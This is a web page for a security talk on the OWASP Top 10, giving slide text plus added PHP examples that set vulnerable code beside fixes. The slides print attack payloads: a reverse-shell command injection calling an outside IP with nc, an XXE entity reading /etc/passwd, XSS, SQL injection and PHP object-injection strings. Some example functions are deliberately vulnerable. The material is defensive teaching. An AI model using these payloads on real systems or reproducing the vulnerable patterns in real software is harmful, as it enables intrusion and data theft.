
Hack Me If You Can

151 views

Published on

Cloud Native Night, September 2020, talk by Janosch Maier (@Phylu, Co-Founder, Crashtest Security)

== Please download slides if blurred! ==

You are confident that your web application is secure? No hacker can touch you? Good for you – or not... Only if you know how a hacker thinks can you really protect yourself. Therefore, in this virtual "escape the room" game, several hacking challenges are waiting for you. By exploiting flaws in a web application, you will see what is possible without much preparation and with a very simple toolset – a modern web browser. Keep this experience in mind when working on your next application, in order to defend yourself against malicious attacks.

About Janosch:
Janosch Maier was only 15 when he created his own tool to record passwords. Ever since then, he has questioned publicly available software and looked for security flaws wherever he could. While living in Uganda, he met Hackers for Charity, where he got his first taste of hacking for a good cause. Since then, Janosch has been on a crusade to enable developers and security experts to cope with the challenges of agile security principles. Especially in modern, agile environments, it is no longer sufficient to conduct manual, infrequent security tests. As an engaging speaker and Co-Founder of Crashtest Security, his mission is to educate DevOps teams on how to integrate security into their development processes.

Published in: Data & Analytics

Hack Me If You Can

  1. Hack Me If You Can! 30.09.2020 | Crashtest Security GmbH | www.crashtest-security.com
  2. “SOFTWARE IS EATING THE WORLD” – Marc Andreessen, 2011
  3. WHO IS KEEPING IT SECURE?
  4. Who is Crashtest Security: Cyber Security Experts from Munich. Crashtest Security provides automated penetration testing for web apps and APIs. Management Team / Me
  5. Selection of partners & customers that trust us: Hassan Moradi, Penetration Test Team Leader - TÜV SÜD; Tobias Hadem, Director for IT Infrastructure and Operations - Flixbus
  6. “Hack me if you can!” https://hacking-challenge.herokuapp.com
  7. OWASP Top 10: Vulnerability / Example
  8. A1 – SQL Injection
     Example payload: ' OR '1' = '1
     Mitigation (ORM model with bound parameters):
       $user = new User;
       $user->username = $request->username;
       $user->password = $request->password;
       $user->email = $request->email;
       $user->save();
  9. A1 – SQL Injection
     Mitigation (mysqli prepared statement; the SQL text is fixed and input arrives only as bound values):
       $username = $request->username;
       $password = $request->password;
       $email = $request->email;
       $stmt = $mysqli->prepare("INSERT INTO users (username, password, email) VALUES (?, ?, ?)");
       $stmt->bind_param("sss", $username, $password, $email);
       $stmt->execute();
     Mitigation (allowlist validation of the input characters):
       # Note: "_-@" in the slide's email class is an invalid (descending) range; the hyphen
       # must go last, and "." is needed for any real address.
       if (preg_match("/[^A-Za-z0-9]/", $username)
           || preg_match("/[^A-Za-z0-9!_-]/", $password)
           || preg_match("/[^A-Za-z0-9_@.-]/", $email)) {
           echo "Invalid Characters!";
       } else {
           # Run Database Command
       }
  10. A1 – Command Injection
      Example payload (entered into a host field): 8.8.8.8; mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 176.28.13.204 1234 1>/tmp/backpipe
      Mitigation: escapeshellarg()
  11. A2 – Broken Authentication
      Example tool: hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]
      Mitigation
  12. A3 – Sensitive Data Exposure
      Mitigation
  13. A4 – XML External Entity Processing (XXE)
      Example payload:
        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE credentials [<!ELEMENT credentials ANY> <!ELEMENT user ANY> <!ENTITY user SYSTEM "file:///etc/passwd">]>
        <credentials> <user>&user;</user> </credentials>
      Mitigation: libxml_disable_entity_loader();
  14. A5 – Broken Access Control
      Example: https://example.com/?user_id=1
      Mitigation
  15. A6 – Security Misconfiguration
      Mitigation (Apache TLS configuration):
        SSLProtocol all -SSLv3 -TLSv1 -TLSv1.1
        SSLCipherSuite ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
        SSLHonorCipherOrder on
        SSLCompression off
  16. A7 – Cross-Site-Scripting (XSS)
      Example payload:
        <style> h1 { animation: blink 1s linear infinite; } @keyframes blink { from { opacity: 0; } to { opacity: 1; } } </style>
        <script>document.getElementsByTagName("h1")[0].innerHTML = "You got Hacked!"</script>
      Mitigation: htmlspecialchars($input)
  17. A8 – Insecure Deserialization
      Example payload: O:9:"TestClass":1:{s:15:"%00TestClass%00hook";s:10:"phpinfo();";}
      Mitigation
  18. A9 – Components with known Vulnerabilities
      Example: https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/version_id-164957/PHP-PHP-5.5.9.html
      Mitigation
  19. A10 – Insufficient Logging & Monitoring
      Mitigation
  20. Traditional Security: Manual testing with large time intervals [Chart: security level over time; vulnerability, remediation, manual security test]
  21. DevSecOps = DevOps + Security [Diagram: DEV / OPS]
  22. DevSecOps = DevOps + Security [Diagram: DEV / OPS]
  23. DevSecOps & Continuous Security: For maximum protection [Chart: security level over time with automated testing; vulnerability, remediation, manual security test]
  24. What Crashtest Security offers: Dynamic Application Security Testing from Germany; Scanning for the OWASP Top 10 vulnerabilities; Focus on Web Applications & REST APIs; Advanced automated testing of JavaScript applications (Deep Scan); Integrated into CI/CD pipeline within 30 minutes; Made, hosted and processed in Germany
  25. How is security handled in your organisation? Which role is security playing for you? Contact me now
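Slides 8 and 9 contrast the `' OR '1' = '1` payload with bound parameters. The following is an added example, not code from the talk or from Crashtest Security: it runs the same login query both ways against an in-memory SQLite database (the `users` table and its single row are constructed here; it assumes the pdo_sqlite extension is available) so the difference is visible without a real MySQL server.

```php
<?php
// Added example: one login query built by string concatenation and by a prepared statement.
// The database, table and row are constructed here so the script runs offline.
declare(strict_types=1);

function setupDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (username TEXT, password TEXT, email TEXT)');
    $pdo->exec("INSERT INTO users VALUES ('alice', 'correct-horse', 'alice@example.com')");
    return $pdo;
}

// Vulnerable: user input is spliced into the SQL text, so quotes in the input change the query.
function loginVulnerable(PDO $pdo, string $username, string $password): int {
    $sql = "SELECT COUNT(*) FROM users WHERE username = '$username' AND password = '$password'";
    return (int) $pdo->query($sql)->fetchColumn();
}

// Fixed: the SQL text is constant; input only ever reaches the database as a bound value.
function loginSafe(PDO $pdo, string $username, string $password): int {
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$username, $password]);
    return (int) $stmt->fetchColumn();
}

$pdo = setupDb();
$payload = "' OR '1' = '1";   // the payload shown on slide 8

// Concatenated query becomes:
//   ... WHERE username = '' OR '1' = '1' AND password = '' OR '1' = '1'
// which is always true, so the attacker "logs in" as some row without any credentials.
printf("concatenated: %d matching row(s)\n", loginVulnerable($pdo, $payload, $payload)); // 1
// The prepared statement compares the literal string ' OR '1' = '1 against the column.
printf("prepared:     %d matching row(s)\n", loginSafe($pdo, $payload, $payload));       // 0
```

The allowlist check on slide 9 is a useful second layer, but it is the prepared statement that removes the vulnerability: the database receives the query structure and the data separately, so no input character can alter the structure.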
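Slide 10 names `escapeshellarg()` as the mitigation for command injection. Here is an added example, not from the talk, showing why quoting alone is only half the answer: it builds (but does not execute) a `ping` command from a user-supplied host, first naively and then with an IP allowlist plus `escapeshellarg()`. The two sample inputs are constructed; the second carries a shell metacharacter to show how it is neutralised.

```php
<?php
// Added example: composing a shell command from untrusted input. The command is only
// built and printed, never run, so the effect of each approach can be inspected safely.
declare(strict_types=1);

// Vulnerable: the raw string becomes part of the command line the shell will parse,
// so ';', '|', '$(...)' and friends let the input append its own commands.
function buildPingCommandVulnerable(string $host): string {
    return 'ping -c 1 ' . $host;
}

// Hardened: validate against what the field is supposed to contain, then quote.
function buildPingCommandSafe(string $host): ?string {
    // 1. Allowlist: the field expects an IP address, so accept nothing else.
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // 2. escapeshellarg() wraps the value in single quotes and escapes embedded quotes,
    //    so the shell hands the whole value to ping as exactly one argument.
    return 'ping -c 1 ' . escapeshellarg($host);
}

$inputs = ['8.8.8.8', '8.8.8.8; id'];   // constructed sample inputs
foreach ($inputs as $in) {
    printf("%-14s vulnerable: %s\n", $in, buildPingCommandVulnerable($in));
    printf("%-14s safe:       %s\n", $in, buildPingCommandSafe($in) ?? '(rejected by allowlist)');
}
// With the allowlist removed, escapeshellarg('8.8.8.8; id') would still produce the single
// quoted argument '8.8.8.8; id': ping fails on a bad host name instead of the shell running "id".
```

Prefer to avoid the shell entirely where the runtime allows it (for example, passing an argument array to a process API), and keep the allowlist even when quoting is in place: quoting stops the shell from interpreting the value, but it does not stop the invoked program from misinterpreting an unexpected argument (such as one starting with `-`).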
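Slide 13 shows an XXE payload and names `libxml_disable_entity_loader()`. As an added example (not code from the talk), the parser below applies two defences that do not depend on that function: it rejects any document carrying a DOCTYPE, and it parses with `LIBXML_NONET` and without `LIBXML_NOENT`. The XML input is constructed after the slide's payload but points at a placeholder path rather than `/etc/passwd`.

```php
<?php
// Added example: parsing untrusted XML with DOMDocument so that external entities
// can never be fetched or substituted. The input document is constructed here.
declare(strict_types=1);

$untrusted = <<<'XML'
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE credentials [<!ENTITY user SYSTEM "file:///placeholder/secret-file">]>
<credentials><user>&user;</user></credentials>
XML;

function parseCredentials(string $xml): ?string {
    // 1. A credentials document has no legitimate reason to declare a DTD at all,
    //    so refuse the whole request as soon as a DOCTYPE appears.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }
    // 2. Parse defensively anyway: LIBXML_NONET forbids network fetches and, because
    //    LIBXML_NOENT is NOT passed, entity references are not substituted into text.
    //    libxml_disable_entity_loader() from the slide is deprecated since PHP 8.0;
    //    with libxml >= 2.9 the external entity loader is already off by default.
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        return null;   // malformed input: treat as an error, do not guess
    }
    $node = $dom->getElementsByTagName('user')->item(0);
    return $node ? $node->textContent : null;
}

var_dump(parseCredentials($untrusted));                                        // NULL: rejected at step 1
var_dump(parseCredentials('<credentials><user>alice</user></credentials>'));  // string(5) "alice"
```

Disallowing the DOCTYPE at the boundary is the simplest check to audit, and it also covers entity-expansion ("billion laughs") documents that never touch an external resource.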
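Slide 16 gives `htmlspecialchars($input)` as the XSS mitigation. The added example below (not code from the talk) renders the slide's `<script>` payload into a heading with and without output encoding, using the flag set a practitioner would actually want on the call. The page template is constructed here.

```php
<?php
// Added example: reflecting a user-supplied name into an HTML page. The rendering
// functions are constructed for illustration; the payload is the one from slide 16.
declare(strict_types=1);

// Vulnerable: the value is inserted as markup, so a <script> tag in it is executed.
function renderGreetingVulnerable(string $name): string {
    return "<h1>Hello, $name</h1>";
}

// Output-encoding helper for HTML element and attribute context.
function e(string $value): string {
    // ENT_QUOTES:     escape both ' and " so the value is also safe inside attributes.
    // ENT_SUBSTITUTE: replace invalid UTF-8 instead of returning an empty string.
    // ENT_HTML5 + charset: encode for the document type and encoding actually emitted.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderGreetingSafe(string $name): string {
    return '<h1>Hello, ' . e($name) . '</h1>';
}

$payload = '<script>document.getElementsByTagName("h1")[0].innerHTML = "You got Hacked!"</script>';

echo renderGreetingVulnerable($payload), "\n";  // browser parses and runs the script
echo renderGreetingSafe($payload), "\n";        // &lt;script&gt;... is shown as literal text
```

`htmlspecialchars()` is the right tool for HTML body and attribute context only. A value placed inside a JavaScript string, a URL, or a CSS block needs the encoding for that context, which is why template engines that encode by default per context are preferable to remembering the call at every output site.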
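Slide 17 shows a serialized PHP object whose private `hook` property is attacker-controlled. The following added example (not code from the talk) defines a stand-in `TestClass` with a `__wakeup()` hook so the effect of `unserialize()` on that exact string can be observed, then applies the two mitigations a practitioner would reach for: the `allowed_classes` option and a data-only format.

```php
<?php
// Added example: the slide's payload processed with and without object instantiation.
// TestClass and its hook are constructed stand-ins for whatever class the original targeted.
declare(strict_types=1);

class TestClass {
    private string $hook = '';

    // Magic method that PHP calls automatically on unserialize(): when the object's
    // properties come from the request, this is where a gadget would do its work.
    public function __wakeup(): void {
        echo "__wakeup ran with hook = {$this->hook}\n";
    }
}

// Serialized TestClass with one private property. Private property names are mangled
// as "\0Class\0name" (15 bytes here); the slide shows the NUL bytes URL-encoded as %00.
$payload = 'O:9:"TestClass":1:{s:15:"' . "\0TestClass\0" . 'hook";s:10:"phpinfo();";}';

// Vulnerable: unserialize() instantiates whatever class the data names and runs __wakeup().
$obj = unserialize($payload);
var_dump($obj instanceof TestClass);                   // bool(true), after __wakeup printed its line

// Mitigation 1: when only scalars and arrays are expected, forbid object creation entirely.
// The object arrives as __PHP_Incomplete_Class and no magic method is invoked.
$inert = unserialize($payload, ['allowed_classes' => false]);
var_dump($inert instanceof __PHP_Incomplete_Class);    // bool(true)

// Mitigation 2: do not let PHP's native format cross a trust boundary at all; JSON
// carries data only and cannot name a class or trigger a method.
$json = json_encode(['hook' => 'phpinfo();']);
var_dump(json_decode($json, true));                    // array(1) { ["hook"]=> string(10) "phpinfo();" }
```

If objects genuinely must be deserialized, `allowed_classes` can list the expected class names instead of `false`, but the safer design is a signed or encrypted envelope checked before `unserialize()` is ever called, so untrusted bytes never reach it.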
